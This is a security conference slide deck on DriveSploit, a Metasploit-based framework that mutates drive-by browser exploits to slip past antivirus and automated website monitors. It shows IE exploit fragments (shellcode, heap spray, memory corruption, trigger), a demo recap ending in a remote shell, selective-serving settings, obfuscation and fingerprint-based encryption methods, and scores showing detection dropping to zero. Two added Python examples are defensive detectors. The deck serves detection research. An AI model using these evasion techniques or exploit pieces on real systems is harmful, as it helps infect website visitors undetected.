
DRIVESPLOIT
CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS

Wayne Huang, Cofounder & CTO
Fyodor Yarochkin
Antonio Rohman Fernandez
Chris Hsiao
Armorize Technologies, Inc.
@waynehuang
wayne@armorize.com

One type of browser exploit: Drive-by Downloads defined

Drive-by-Download Explained
Hackers distribute malware by "poisoning" legitimate websites
Typical: injects malicious iframes into HTML content

Affected websites:
Essentially become a delivery mechanism for malware
Appear normal

Victims:
Do not need to "click" or "agree to" anything
Simply connecting to the website executes the attack

Drive-by Download Incidents

Aurora (Google)
June 2009 - Feb 2010
Targeted attack
IE 0day CVE-2010-0249
Confirmed publicly by Google, Adobe Systems, Juniper Networks and RackSpace
Total of 34 organizations targeted

Drive-by Download Incidents

DNF666 Mass SQL Injection
Since March, 2010
Jun: Adobe 0day CVE-2010-1297
Victims: Wall Street Journal, Jerusalem Post, etc.
dnf666.net, robint.us, 2677.in, 4589.in, 22dnf.com

Further incidents shown: CNN, GameSpot, US Treasury (http://thompson.blog.avg.com/2010/05/treasurywebsitehacked.html), PlayStation.com, Washington Post

Dissecting Drive-By Downloads

Page + Browser -> Exploit -> Payload = downloader
Exploit Server

Example of an injected script (truncated on the slide):
<script>var sc=unescape("

var arr =new Array;for (var i =0;i <sss.length;i ++){arr[i]=String.fromCharCode(sss[i]/7);}var
cc=arr.toString();cc=cc.replace(/,/g,"");cc=cc.replace(/@/g,",");eval(cc);var x1=new Array();for (i =0;i <
200;i ++){x1[i]=document.createElement("COMMENT");x1[i].data="abc";};var e1=null;function ev1(evt){
e1=document.createEventObject(evt);document.getElementById("sp1").innerHTML ="";
window.setInterval(ev2,50);}function ev2(){p="\


Dissecting Drive-By Downloads

Exploit! -> Exploits / droppers -> Dropper executes
Exploit Server -> Malware Server -> Malware
Controller

But who would visit? The key now is TRAFFIC.

(1) Legitimate, injectable sites

URL Generators -> Landing Site -> Exploit Server (exploits / droppers) -> Malware Server (malware) -> Controller

May-Ongoing: DNF666 mass SQL injections
May-June: Shared hosting compromise: GoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost
Continuous targeted attacks

(1) Legitimate, vulnerable sites

Mass SQL injections
Mass hosting compromises
Directly inside HTML / PHP / ASP
Hidden inside WordPress files
Hidden inside DB
Hidden inside DB stored procedures

(2) Man-in-the-Middle

No tampering of website
LAN: ARP spoofing via ZXARPS and other tools
WAN: March 2009, middle of route, tw.msn.com, taiwan.cnet.com, others
Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778

LIVE DEMO 1

http://digg.com/software/Internet_Storm_Center_Diary_2010_02_27

Live demo recap

Injected javascript in digg.com

1. Inject javascript into digg.com
2. Javascript loads iframe from our domain zcrack.org
3. Metasploit (drivesploit) is running on zcrack.org, serves IE peers exploit
4. Bypasses AV
5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe
6. We have a shell :)

MOTIVATION
We provide solutions that monitor websites and detect malicious contents 24x7
We use multiple behavior-, heuristic-, and signature-based technologies

MOTIVATION
Most technologies are developed on our own, BUT,
We also integrate anti-virus, whose licenses are $expensive$

MOTIVATION
We spend a lot of time testing our own technologies, and selecting anti-virus technologies
The key is: how good are we (and them) at detecting NEW drive-by downloads

MOTIVATION
We need a good framework to help us replicate, manipulate, and mutate exploits found in the wild
--into NEW derivatives

DRIVESPLOIT IS BORN ON TOP OF METASPLOIT

INITIAL FINDINGS
ANTIVIRUS CAPABILITIES
DIFFER GREATLY!
DESKTOP AND API VERSIONS
DIFFER GREATLY IN PERFORMANCE
COST != PERFORMANCE

Antivirus vs. Drive-bys

URL Generators: JAVASCRIPT
Landing Site: JAVASCRIPT
Exploit Server (exploits / droppers): JAVASCRIPT
Malware Server (malware): PE BINARY
Controller

We will detect this part!!

Why we can't rely on PE detection

Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on:
Attack reported to the hosting / registrar
Domain banned by ISPs
Purchased duration was over

We want to detect the injection so our customers can remove it
Actually, statically detecting javascript exploits is quite difficult

THE TAO: ECMA-SCRIPTS
JAVASCRIPT
VBSCRIPT
ADOBE JS
ACTIONSCRIPT

JAVASCRIPT!! (ECMA-SCRIPT)

URL Generators -> Landing Site -> Exploit Server (METASPLOIT), exploits / droppers -> Controller
PAYLOAD: meterpreter (memory injection)
The malware server and the malware itself drop out of the chain when the payload is injected in memory.

Drive-By wants to
Avoid detection at the victim's desktop
Avoid detection by UTM/gateways
Avoid detection by automated monitors
Live for as long as possible

Drive-By wants to
CONCLUSION:
Reduce exposure: Serve SELECTIVELY
Avoid detection and analysis: Mutate well
Serve Selectively
HTTP LEVEL:
Serve only to:
Fresh IPs (serve once per IP)
    set HTTP::client::onlyonce true
Particular referer (eg. Gumblar)
    set HTTP::referer google.com
Particular agent string (vulnerable browser)
    set HTTP::agent::MSIE 7.0
Black list
    set HTTP::client::blacklist false
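Added example, not from the talk or from DriveSploit: the monitor-side counterpart to the options above, a differential fetch that requests the same landing page under several client profiles and flags responses that depend on the agent string, the referer, or a prior visit from the same IP. The fetch callable, the profile values and the _CloakingSite test double are constructed for this example.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class ClientProfile:
    """How the monitor presents itself on one fetch. All values constructed."""
    name: str
    ip: str
    agent: str
    referer: str


# Assumed rotation set. The slide's serve-only-to conditions are a fresh IP, a
# vulnerable-browser agent string and a particular referer, so a monitor that
# crawls once from a fixed scanner address with its own agent string sees only
# the clean page; it has to vary all three and compare what comes back.
IE7 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
PROFILES = (
    ClientProfile("scanner", "198.51.100.10", "WebsiteMonitor/1.0", ""),
    ClientProfile("ie7_direct", "203.0.113.21", IE7, ""),
    ClientProfile("ie7_from_google", "203.0.113.22", IE7, "http://www.google.com/"),
)


def _digest(body):
    return hashlib.sha256(body.encode()).hexdigest()


def differential_fetch(fetch, url, profiles=PROFILES):
    """fetch(url, profile) -> body text. Fetch the URL under every profile,
    then once more with the last profile from the same IP. Bodies that change
    with agent/referer, or that differ on the replay ("serve once per IP"),
    are a cloaking signal the monitor should escalate for manual review."""
    seen = {p.name: _digest(fetch(url, p)) for p in profiles}
    replay = _digest(fetch(url, profiles[-1]))
    return {
        "hashes": seen,
        "varies_by_profile": len(set(seen.values())) > 1,
        "changes_on_replay": replay != seen[profiles[-1].name],
    }


class _CloakingSite:
    """Constructed stand-in for the network, not a real server: it applies the
    slide's three conditions (MSIE 7.0 agent, google.com referer, one serve per
    IP) and otherwise returns the untouched page."""
    CLEAN = "<html><body><p>hello</p></body></html>"
    INJECTED = CLEAN.replace(
        "</body>", '<iframe src="http://exploit-server.example/"></iframe></body>')

    def __init__(self):
        self.served_ips = set()

    def fetch(self, url, profile):
        if ("MSIE 7.0" in profile.agent and "google.com" in profile.referer
                and profile.ip not in self.served_ips):
            self.served_ips.add(profile.ip)
            return self.INJECTED
        return self.CLEAN


def run_demo():
    """Run the differential check against the constructed site."""
    return differential_fetch(_CloakingSite().fetch, "http://landing.example/")
```

A real monitor would swap the test double for an HTTP client that sets the agent and referer headers and routes each profile through a different egress address.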

SCRIPT MUTATION
For exploit
For payload

The goal is not to "obfuscate"...

JAVASCRIPT EXPLOIT DISEC
Shellcode / MCorrupt / Heapspray / Trigger

Shellcode:
<script>var shellraw =

JAVASCRIPT EXPLOIT DISEC
Shellcode / MCorrupt / Heapspray / Trigger

MCorrupt:
var j_object = document.createElement('body');
j_object.addBehavior('#default#userData');
document.appendChild(j_object);
try{
for(counter=0;counter<10;counter++){
j_object.setAttribute('s',window);}
}
catch(e){}window.status+='';}

JAVASCRIPT EXPLOIT DISEC
Shellcode / BufferOvf / Heapspray / Trigger

Heapspray:
var counter;var shellcode=unescape(shellraw);
var memory=new Array();var slackspace =0x86000 (shellcode.length*2);
var nops = unescape("%u0c0c%u0c0c");
while(nops.length<slackspace/2){nops+=nops;}
var fillblock = nops.substring(0,slackspace/2);
delete nops;
for(counter=0;counter<270;counter++){memory[counter]=fillblock + fillblock + fillblock + shellcode;

JAVASCRIPT EXPLOIT DISEC
Shellcode / MCorrupt / Heapspray / Trigger

Trigger:
<button id='j_id' onclick='bootstrapper();' style='display:none'></button>
document.getElementById('j_id').onclick();

JAVASCRIPT EXPLOIT DISEC
Shellcode / MCorrupt / Heapspray / Trigger

OBFUSCATED BLOB -> DEOBFUSCATOR
Obfuscated Form -> Primitive Form


JAVASCRIPT EXPLOIT DISEC
Start: Shellcode / MCorrupt / Heapspray
Mutate: OBFUSCATED BLOB
Prevent: Trigger
DEOBFUSCATOR: Obfuscated Form -> Primitive Form

MUTATION FEATURES IMPLEMENTED SO FAR

1. Javascript Random Variable Auto Replacement
Accepts a piece of javascript
Parses the javascript according to grammar
Auto replaces all variable names and function names with random names
Passes back:
a) the new javascript
b) a vector of old-new name mappings

1. Javascript Random Variable Auto Replacement
randomized = Rex::Exploitation::DriveSploit::obfuscatejs(js, Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)

2. Javascript Concat String Obfuscation
arr = Rex::Exploitation::DriveSploit.obfuscatejs(shellcode, Rex::Exploitation::DriveSploit::STRING_CONCAT)
shellcode_script = arr[0]
shellcode_var = arr[1]

2. Javascript Concat String Obfuscation
Original string: %u7679%u4673%u757%u924e

Layer 1, split into fragments:
A1 = "%u7";
A2 = "679%";
A3 = "u4673%";
A4 = "u75";
A5 = "7%u92";
A6 = "4e";

Layer 1, declaration order shuffled:
A3 = "u4673%";
A4 = "u75";
A1 = "%u7";
A5 = "7%u92";
A2 = "679%";
A6 = "4e";

Layer 2:
B1 = A1+A2;
B2 = A3+A4;
B3 = A5+A6;

Layer 2, declaration order shuffled:
B2 = A1+A2;
B3 = A5+A6;
B1 = A3+A4;

Combined output:
A3 = "u4673%";A4 = "u75";
A1 = "%u7";
A5 = "7%u92";A2 = "679%";
A6 = "4e";
B2 = A1+A2;
B1 = A3+A4;B3 = A5+A6;C1=B1+B2;
D1=C1+B3;
// variable names are randomized

3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
shellcode = insertret[0]
random_insertion_string = insertret[1]
# insert a fixed 6-character random string, for every 4-8 characters

returns
a) a piece of javascript containing the injected string
b) Javascript variable name containing the reverted, original string

4. Numeric Literal Mutation
slackspace = Rex::Exploitation::DriveSploit.obfuscateNumber(0x86000)
returns: (246*2)+(5676*96)+(34*4)+8+(3332*1)

slackspace = 0x86000
becomes
slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)
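Added example (not DriveSploit's or the talk's code): a defender-side normalizer that undoes the concat-string (feature 2) and numeric literal (feature 4) mutations by constant-folding the assignment sequence, then flags what the folded values look like. The constructed input is the page's own fragments in their shuffled declaration order, recombined in the page's layer-2 order, plus the mutated 0x86000 literal; the flagging thresholds in triage() are assumptions.

```python
import ast
import re

# Python's expression grammar happens to cover the JS subset these mutations
# emit (double-quoted strings, "+" concatenation, integer arithmetic, hex
# literals), so each statement is parsed with `ast` and folded by walking the
# tree; nothing is eval()'d. Toy limits: split on ";" and comments cut at "//".
_LEADING_VAR = re.compile(r"^var\s+")
_LINE_COMMENT = re.compile(r"//.*$", re.M)
_UNICODE_ESC = re.compile(r"%u[0-9a-fA-F]{4}")


def _fold(node, env):
    """Evaluate a parsed expression against the variables seen so far."""
    if isinstance(node, ast.Constant):
        return node.value
    if isinstance(node, ast.Name):
        return env[node.id]  # KeyError: name assigned nowhere in the snippet
    if isinstance(node, ast.BinOp):
        left, right = _fold(node.left, env), _fold(node.right, env)
        if isinstance(node.op, ast.Add):
            return left + right
        if isinstance(node.op, ast.Sub):
            return left - right
        if isinstance(node.op, ast.Mult):
            return left * right
    raise ValueError("unsupported construct: " + ast.dump(node))


def fold_literals(js):
    """Map every assigned name to its folded literal, in source order."""
    env = {}
    for stmt in _LINE_COMMENT.sub("", js).split(";"):
        stmt = _LEADING_VAR.sub("", stmt.strip())
        if not stmt:
            continue
        name, expr = (part.strip() for part in stmt.split("=", 1))
        env[name] = _fold(ast.parse(expr, mode="eval").body, env)
    return env


def triage(env, spray_threshold=0x10000):
    """Flag folded values matching the dissection on the page: %u-escaped
    strings (what unescape() turns into shellcode or a NOP sled) and numbers
    large enough to be a heap-spray block size. Both thresholds are assumed."""
    findings = []
    for name, value in env.items():
        if isinstance(value, str) and len(_UNICODE_ESC.findall(value)) >= 3:
            findings.append(("unicode_escaped_string", name, value))
        elif isinstance(value, int) and value >= spray_threshold:
            findings.append(("heap_spray_sized_number", name, value))
    return findings


# Constructed input: the page's fragments in their shuffled declaration order,
# recombined in the page's layer-2 order, plus the mutated 0x86000 literal.
SAMPLE_JS = """
A3 = "u4673%";A4 = "u75";
A1 = "%u7";
A5 = "7%u92";A2 = "679%";
A6 = "4e";
B1 = A1+A2;B2 = A3+A4;B3 = A5+A6;
C1 = B1+B2;D1 = C1+B3;
var slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1);
// variable names are randomized
"""
```

Folding before matching is what makes signature or heuristic checks survive feature 1 as well: the random names never reach the matcher, only the recovered literals do.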

Trigger Prevention
Start: Shellcode / MCorrupt / Heapspray
Mutate: OBFUSCATED BLOB
Prevent: Trigger
DEOBFUSCATOR: Obfuscated Form -> Primitive Form

Trigger prevention
<div onload
<img onload
var a=1; var b=0;
do {
useless code;
} while (a==b);
Fingerprinting-based encryption

TESTING IT OUT
Using the IE peers exploit as example: CVE-2010-0806 (MS10-018)

PLAIN: 17/42
RANDOM VARS: 16/42 (!)
INJECT SC: 13/42
RANDVAR+CONCAT SC+INJECT SC: 11/42

ROUGHLY 6/17 ANTI-VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)

CONCAT SC+CODE: 1/42
INJECT SC+CONCAT CODE: 0/42
RANDVAR+INJECT SC+CONCAT CODE: 0/42

ANTIVIRUS DESKTOP VERSION IS MUCH STRONGER

Can monitor host environment
Hook into browsers
Easier to get raw form of exploit
Behavior analysis:
Buffer overflow behavior
Download-to-file behavior

AntiVirus Desktop Kung Fu

Table of mutation variants (rows) against desktop antivirus products (columns To, Ag, Sc, Aa, Ky); the per-cell results did not survive extraction.
Rows: Plain; Random variables; Split literals; Injection SC; Concat SC; Concat CODE; Concat SC + Concat CODE; Inject SC + Concat CODE

LIVE DEMO 2: DESKTOP ANTIVIRUS BYPASS

5. FINGERPRINTING-BASED ENCRYPTION

Wepawet doesn't tell much

Browser Feature Table

Feature                                           IE7    FF     Safari       Opera  Chrome
Is_contextmenu_event_supported                    True   True   True         False  True
String_prototype_replace_ignore_functions         False  False  True(2.0.2)  False  False
Is_ES5_strict_mode_supported                      False  False  False        False  False
Array_prototype_slice_can_convert_to_array        False  True   True         True   True
Getelementsbytagname_returns_comment_nodes        True   False  False        False  False
Is_element_tagname_uppercased                     True   True   True         True   True
Is_canvas_element_supported                       False  True   True         True   True
Is_DOMFocusIn_supported                           False  False  True         True   True
Is_CSS_boder_radius_supported                     False  True   True         False  True
Function_identified_leaks_onto_enclosing_scope    True   False  False        False  False
Script_element_rejects_textnode_appending         True   False  False        False  False
Is_position_fixed_supported                       False  True   True         False  True
Computed_style_return_static_positioned_element   False  False  False        True   False

5. Fingerprinting-Based Encryption Summary
"This exploit works only for IE6"
"Give me an encrypted version of my javascript exploit"
"Give me javascript to generate the decoding key"
"The key is only correctly generated if the javascript is run under IE6"
94

5. Fingerprinting-Based Encryption Summary
A=Check1();
B=Check3();
C=Check4();
D=Check6();
E=Check8();
F=Check9();
G=Check12();
H=Check14();

Shuffled:
A=Check1();  -> A=Check6();
B=Check3();  -> B=Check12();
C=Check4();  -> C=Check8();
D=Check6();  -> D=Check1();
E=Check8();  -> E=Check4();
F=Check9();  -> F=Check14();
G=Check12(); -> G=Check3();
H=Check14(); -> H=Check9();


One-time key
Encrypt javascript exploit
Generate decoding javascript

Why not Anti-Virus?

AV is to install on desktops / notebooks
Complicated normal behaviors
Strict resource constraints
Therefore, AV and gateway vendors rely on:
Signature-based pattern matching technologies
LIGHTWEIGHT and ACCURATE

Why can't such technology be used to detect drive-by-downloads?

Javascripts are not harmful to the environment, so they are usually not reused (you don't usually reuse them)

AV no good because drive-by-downloads are in:
Disposable Javascript
Disposable PDF Adobe JS
Disposable Flash actionscript
All ECMAscripts

Javascript Packing Is a Norm

Packing is widely used by legitimate code!
To protect javascript source code
To reduce javascript size

Google Closure Compiler
http://code.google.com/closure/compiler/
Yahoo Javascript Packer (YUI Compressor)
http://developer.yahoo.com/yui/compressor/
Advanced HTML Protector
http://www.creabit.com/htmlprotect/
Dean Edwards Packer
http://dean.edwards.name/packer/
Online JS Obfuscator
http://www.iwebtool.com/html_encrypter
http://www.cha88.cn/safe/fromCharCode.php

OK so AV doesn't work (that well)
How about behavior-based approaches?

Defeating Behavior Analysis

1. Use VBScript
Exploits in VBScript
URL generators in VBScript
Exploits in / generated by VBScript
May defeat SpiderMonkey et al (Rhino, JSunPack, etc)

2. Don't serve to detectors
You can't detect what you don't have
Serve to each IP only once
Detect agent strings
Collect robot IPs: Google, Yahoo, security vendors

Defeating Behavior Analysis

3. Fingerprint-based encryption

3. Little but effective techniques
Sleep(30000); //using SetTimeout
Timelock puzzles

Future Work
Randomly chop up scripts and split into individual files
Generating VBscript instead of javascript
Encrypting using data existing outside of HTML: HTTP headers

Discussion
The Panopticlick experiment by Eckersley of EFF: 94.2% of "typical desktop browsers" are unique

Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of target attacks?

THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www.drivesploit.org
Credits: wayne huang, fyodor yarochkin, antonio rohman fernandez

Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding, Felix Cola
